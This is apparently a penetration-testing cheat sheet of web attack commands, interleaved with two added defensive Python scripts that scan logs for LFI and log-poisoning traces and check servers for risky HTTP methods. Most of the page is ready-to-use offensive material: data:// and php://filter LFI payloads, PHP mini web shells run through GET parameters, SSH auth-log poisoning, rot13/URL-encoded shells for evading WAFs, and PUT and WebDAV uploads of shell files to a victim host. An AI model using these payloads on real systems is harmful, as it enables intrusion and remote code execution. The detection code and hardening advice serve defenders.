Joined Adversary Simulation Manual
Web useful commands

Quick References

Fuzzing

dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
dirb http://10.0.0.10 -X .htm,.html,.php
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt http://10.0.0.10/test.php?file=FUZZ

Create wordlist

cewl -w /root/Desktop/words.txt -m 6 https://example.com

WAF detection

wafw00f http://192.168.56.102

Upload Files

curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

General Exploitation

LFI

Simple RFI

page=data://text/plain, <?php system("whoami");?>

Base64 encoded RFI

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==
lang=php://filter/convert.base64-encode/resource=index

Mini shell

page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id

Base64 + URL encoded mini shell

page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id

RCE with LFI and SSH log poisoning

From

  • https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning

ssh '<?php system($_GET['c']); ?>'@192.168.0.23
http://192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=id
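Seen from the defender's side, the data:// and php://filter payloads above and the SSH log-poisoning chain leave two distinctive traces: stream-wrapper prefixes or log-file paths in the web server's access log (often URL-encoded, sometimes twice), and PHP open tags in the username field of sshd's "Invalid user" lines, which is exactly what the `ssh '<?php ...'@host` step writes into auth.log. The following Python scanner is an added example and is not part of this page or of the hackingarticles write-up; every log line in it is a constructed sample, and the regexes are my own rather than a published signature set.

```python
import re
from urllib.parse import unquote

# Constructed sample lines for offline testing; they are not real traffic.
ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=data://text/plain;base64,PD9waHAg HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /lfi/lfi.php?file=/var/log/auth.log&c=id HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1234',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?lang=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex HTTP/1.1" 200 90',
]
AUTH_LOG = [
    "Jan  1 10:00:00 web sshd[1234]: Invalid user <?php system($_GET['c']); ?> from 10.0.0.5 port 4444",
    "Jan  1 10:00:05 web sshd[1240]: Accepted publickey for deploy from 10.0.0.9 port 5555 ssh2",
]

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# PHP stream wrappers that turn include() of a user-controlled path into code execution or source disclosure
WRAPPER_RE = re.compile(r"(?:\bdata:|php://(?:filter|input)|\bexpect:|\bphar://)", re.I)
# Log files, the process environment and directory traversal used to reach poisoned content
PATH_RE = re.compile(r"(?:/var/log/|/proc/self/environ|\.\./)", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)
SSHD_INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<src>\S+)")


def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%253A...) are normalised before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_line(line):
    """Return the reasons an access-log line looks like an LFI or log-poisoning attempt, or None."""
    m = REQ_RE.search(line)
    if not m:
        return None
    uri = fully_decode(m.group("uri"))
    if "?" not in uri:
        return None
    query = uri.split("?", 1)[1]
    reasons = []
    if WRAPPER_RE.search(query):
        reasons.append("stream-wrapper")
    if PATH_RE.search(query):
        reasons.append("log-or-traversal-path")
    return reasons or None


def scan_auth_line(line):
    """Flag sshd 'Invalid user' entries whose username carries a PHP open tag (a poisoned auth.log)."""
    m = SSHD_INVALID_RE.search(line)
    if m and PHP_TAG_RE.search(m.group("user")):
        return {"source": m.group("src"), "reason": "php-tag-in-ssh-username"}
    return None


def scan(access_lines, auth_lines):
    """Combine both logs into one list of findings, each carrying the source address for correlation."""
    findings = []
    for line in access_lines:
        reasons = scan_access_line(line)
        if reasons:
            findings.append({"log": "access", "source": line.split(" ", 1)[0], "reasons": reasons})
    for line in auth_lines:
        hit = scan_auth_line(line)
        if hit:
            findings.append({"log": "auth", "source": hit["source"], "reasons": [hit["reason"]]})
    return findings


if __name__ == "__main__":
    for f in scan(ACCESS_LOG, AUTH_LOG):
        print(f"{f['log']:6} {f['source']:10} {', '.join(f['reasons'])}")
```

Run against real files, the same source address showing up in both lists (a PHP tag in an SSH username followed by a request for `/var/log/auth.log` through the include parameter) is the full chain described above. The underlying fix is on the application side: never pass user input to include(), keep `allow_url_include` off, and map page names to files through an allowlist.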

PHP shell WAF escape

Urlencode and rot13 encode

<?php

$enc = <<<ENC
__ENCODED PHP SHELL HERE__
ENC;

assert(urldecode(str_rot13($enc)));
?>

Use

<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php $c=$_GET['c']; echo `$c`; ?>

Insecure Methods

Methods Testing

nc <IP> 80

HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT /FILE_NAME HTTP/1.1
POST /FILE_NAME HTTP/1.1

TRACE

telnet www.victim.com 80
> TRACE / HTTP/1.1
> Host: www.victim.com
curl -k -s -i -X TRACE https://IP -H "Cookies: Reflected"

PUT

curl http://192.168.40.130/test/ --upload-file /root/Desktop/curl.php -v

curl --upload-file php-reverse-shell.txt -v --url http://192.168.40.130/test/shell.php -0 --http1.0

curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage

curl -X PUT -d "text or data to put" http://www.victim.com/destination_page

curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page
cadaver http://<IP>/dav/
put /root/Desktop/shell.php
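The three sections above (method enumeration, TRACE and PUT) reduce to two questions a server owner should be able to answer from the raw responses: which methods does the `Allow:` header of an OPTIONS reply admit, and does a TRACE reply echo the request headers (which is what makes TRACE useful for stealing cookies through cross-site tracing). The Python below is an added example rather than code from this page; it parses constructed raw HTTP responses offline, and the same functions accept the bytes captured from `curl -i` runs like the ones shown above. Host names and cookie values in the samples are made up.

```python
# Methods that should not be reachable on an ordinary web root; PUT/DELETE/WebDAV allow writes,
# TRACE reflects headers, CONNECT turns the server into a proxy.
RISKY_METHODS = ("PUT", "DELETE", "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "TRACE", "CONNECT")

# Constructed sample exchanges: the headers "sent" with TRACE and four possible server replies.
SENT_TRACE_HEADERS = {"Host": "www.example.test", "Cookie": "session=abc123"}
TRACE_BODY = ("TRACE / HTTP/1.1\r\n"
              + "".join(f"{k}: {v}\r\n" for k, v in SENT_TRACE_HEADERS.items()) + "\r\n").encode()
TRACE_ENABLED = (b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\nContent-Length: "
                 + str(len(TRACE_BODY)).encode() + b"\r\n\r\n" + TRACE_BODY)
TRACE_DISABLED = b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET,HEAD,POST,OPTIONS\r\nContent-Length: 0\r\n\r\n"
OPTIONS_WEBDAV = (b"HTTP/1.1 200 OK\r\nAllow: GET,HEAD,POST,OPTIONS,PUT,DELETE,PROPFIND\r\n"
                  b"DAV: 1,2\r\nContent-Length: 0\r\n\r\n")
OPTIONS_HARDENED = b"HTTP/1.1 200 OK\r\nAllow: GET,HEAD,POST,OPTIONS\r\nContent-Length: 0\r\n\r\n"


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, {lowercase header: value}, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def risky_methods_from_options(raw):
    """Methods advertised in the Allow header that belong to RISKY_METHODS, in the server's order."""
    _, headers, _ = parse_response(raw)
    allowed = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    return [m for m in allowed if m in RISKY_METHODS]


def trace_reflects(raw, sent_headers):
    """True when a 200 reply to TRACE echoes any header line that was sent (cross-site tracing risk)."""
    status, _, body = parse_response(raw)
    if status != 200:
        return False
    text = body.decode("iso-8859-1")
    return any(f"{name}: {value}" in text for name, value in sent_headers.items())


def assess(options_raw, trace_raw, sent_headers):
    """One summary dict per host: what is writable and whether TRACE leaks headers."""
    return {
        "risky_methods": risky_methods_from_options(options_raw),
        "trace_reflects_headers": trace_reflects(trace_raw, sent_headers),
        "trace_content_type": parse_response(trace_raw)[1].get("content-type"),
    }


if __name__ == "__main__":
    print("before:", assess(OPTIONS_WEBDAV, TRACE_ENABLED, SENT_TRACE_HEADERS))
    print("after: ", assess(OPTIONS_HARDENED, TRACE_DISABLED, SENT_TRACE_HEADERS))
```

When the "before" picture shows up on a server you run, the fixes are configuration, not code: on Apache set `TraceEnable Off`, do not load mod_dav on a public vhost, and wrap writable paths in `<LimitExcept GET POST HEAD>` with `Require all denied`; on nginx reject everything else with `if ($request_method !~ ^(GET|HEAD|POST)$) { return 405; }`. Re-run the two requests afterwards and expect the "after" result: no risky methods in `Allow` and a 405 for TRACE.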

References

  • http://pentestmonkey.net
    • White Papers
      • Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
      • Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
      • Blind Security Testing - An Evolutionary Approach
      • Command Injection in XML Signatures and Encryption
      • Input Validation Cheat Sheet
      • SQL Injection Cheat Sheet